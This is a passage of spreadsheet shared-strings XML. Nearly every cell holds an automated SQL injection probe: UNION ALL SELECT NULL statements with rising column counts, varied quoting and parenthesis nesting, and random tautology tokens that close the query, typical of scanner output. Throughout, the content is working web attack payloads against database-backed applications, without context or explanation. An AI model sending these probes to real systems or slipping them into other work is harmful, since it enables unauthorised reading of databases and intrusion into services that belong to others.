  <si>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"enuL" LIKE "enuL</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "VXSC" LIKE "VXSC</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ObaY" LIKE "ObaY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "yAne" LIKE "yAne</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ZhxG" LIKE "ZhxG</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "WExb" LIKE "WExb</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "vZYh" LIKE "vZYh</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ZRWV" LIKE "ZRWV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "mrDQ" LIKE "mrDQ</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ebVT" LIKE "ebVT</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</si>
  <si>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"PNcC" LIKE "PNcC</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3159 = 3159</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2629 = 2629</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3891 = 3891</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 1471 = 1471</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 803 = 803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</si>
  <si>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( 2678 = 2678</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</si>
  <si>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( 3250 = 3250</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</si>
  <si>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( 9285 = 9285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</si>
  <si>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( 2839 = 2839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</si>
  <si>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( 8630 = 8630</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1587 = 1587</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  890 = 890</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8424 = 8424</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1407 = 1407</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1497 = 1497</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</si>
  <si>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4765 = 4765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</si>
  <si>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359 = 359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</si>
  <si>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211 = 211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</si>
  <si>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9783 = 9783</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</si>
  <si>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4326 = 4326</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 510 = 510</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 9594 = 9594</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3843 = 3843</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 5976 = 5976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</si>
  <si>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( 4347 = 4347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</si>
  <si>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( 8893 = 8893</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</si>
  <si>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( 4345 = 4345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</si>
  <si>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( 1856 = 1856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</si>
  <si>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( 4542 = 4542</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</si>
  <si>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( 5939 = 5939</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'kcDM' = 'kcDM</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'NCRF' = 'NCRF</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'hFNL' = 'hFNL</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'gCVU' = 'gCVU</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'mGCW' = 'mGCW</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ahKP' = 'ahKP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ndMV' = 'ndMV</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'xCNX' = 'xCNX</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'qghl' = 'qghl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</si>
  <si>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'UrAA' = 'UrAA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'dxGi' = 'dxGi</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'wCau' = 'wCau</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'tKoF' = 'tKoF</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'LTQJ' = 'LTQJ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'zdzn' = 'zdzn</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'XcqR' = 'XcqR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'JISC' = 'JISC</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'hwyp' = 'hwyp</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</si>
  <si>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'VkAr' = 'VkAr</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</si>
  <si>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'hYvO' = 'hYvO</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'NjsS' = 'NjsS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'JfAH' = 'JfAH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ycoI' = 'ycoI</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'YvnS' = 'YvnS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'jgfG' = 'jgfG</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'NSBA' = 'NSBA</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'OYXs' = 'OYXs</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'GMyC' = 'GMyC</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</si>
  <si>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'agtu' = 'agtu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</si>
  <si>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'VjKi' = 'VjKi</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'OdHs' = 'OdHs</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'WdNU' = 'WdNU</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'xywK' = 'xywK</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'QCUs' = 'QCUs</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'thny' = 'thny</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'mWDL' = 'mWDL</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'RFDx' = 'RFDx</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'XzOq' = 'XzOq</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'MPUQ' = 'MPUQ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</si>
  <si>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'rqcj' = 'rqcj</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'vqUZ' LIKE 'vqUZ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ZLDY' LIKE 'ZLDY</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'rkzS' LIKE 'rkzS</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'YFKu' LIKE 'YFKu</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'rDQx' LIKE 'rDQx</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'hXrV' LIKE 'hXrV</t>
  </si>
  <si>
